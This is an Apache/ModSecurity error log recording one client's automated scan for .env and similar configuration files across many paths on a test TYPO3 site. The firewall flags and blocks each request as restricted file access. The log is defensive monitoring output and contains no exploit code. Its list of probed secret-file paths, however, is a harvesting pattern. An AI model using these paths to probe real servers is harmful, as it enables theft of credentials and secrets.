[Sun Aug 10 18:02:05.871411 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRAAAAAI"]
[Sun Aug 10 18:02:05.891940 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRQAAAAI"]
[Sun Aug 10 18:02:05.892197 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRQAAAAI"]
[Sun Aug 10 18:02:05.892388 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRQAAAAI"]
[Sun Aug 10 18:02:05.915571 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRgAAAAI"]
[Sun Aug 10 18:02:05.915798 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRgAAAAI"]
[Sun Aug 10 18:02:05.915976 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRgAAAAI"]
[Sun Aug 10 18:02:05.936377 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRwAAAAI"]
[Sun Aug 10 18:02:05.936645 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRwAAAAI"]
[Sun Aug 10 18:02:05.936849 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdRwAAAAI"]
[Sun Aug 10 18:02:05.957301 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/laravel/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdSAAAAAI"]
[Sun Aug 10 18:02:05.957544 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdSAAAAAI"]
[Sun Aug 10 18:02:05.957739 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdSAAAAAI"]
[Sun Aug 10 18:02:05.978153 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdSQAAAAI"]
[Sun Aug 10 18:02:05.978414 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdSQAAAAI"]
[Sun Aug 10 18:02:05.978618 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "aJjCfSTM1z0kwYTEsGjdSQAAAAI"]
[Sun Aug 10 18:02:05.998817 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci
[Sun Aug 10 18:02:06.019761 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdSwAAAAI"]
[Sun Aug 10 18:02:06.020005 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdSwAAAAI"]
[Sun Aug 10 18:02:06.020195 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdSwAAAAI"]
[Sun Aug 10 18:02:06.040707 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTAAAAAI"]
[Sun Aug 10 18:02:06.040951 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTAAAAAI"]
[Sun Aug 10 18:02:06.041148 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTAAAAAI"]
[Sun Aug 10 18:02:06.061761 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTQAAAAI"]
[Sun Aug 10 18:02:06.062007 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTQAAAAI"]
[Sun Aug 10 18:02:06.062194 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTQAAAAI"]
[Sun Aug 10 18:02:06.083061 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTgAAAAI"]
[Sun Aug 10 18:02:06.083374 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTgAAAAI"]
[Sun Aug 10 18:02:06.083611 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTgAAAAI"]
[Sun Aug 10 18:02:06.104077 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTwAAAAI"]
[Sun Aug 10 18:02:06.104376 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTwAAAAI"]
[Sun Aug 10 18:02:06.104601 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdTwAAAAI"]
[Sun Aug 10 18:02:06.166735 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin-app/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdUQAAAAI"]
[Sun Aug 10 18:02:06.166982 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin-app/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdUQAAAAI"]
[Sun Aug 10 18:02:06.167166 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin-app/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdUQAAAAI"]
[Sun Aug 10 18:02:06.187967 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdUgAAAAI"]
[Sun Aug 10 18:02:06.188348 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdUgAAAAI"]
[Sun Aug 10 18:02:06.188658 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdUgAAAAI"]
[Sun Aug 10 18:02:06.209392 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdUwAAAAI"]
[Sun Aug 10 18:02:06.209641 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdUwAAAAI"]
[Sun Aug 10 18:02:06.209842 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdUwAAAAI"]
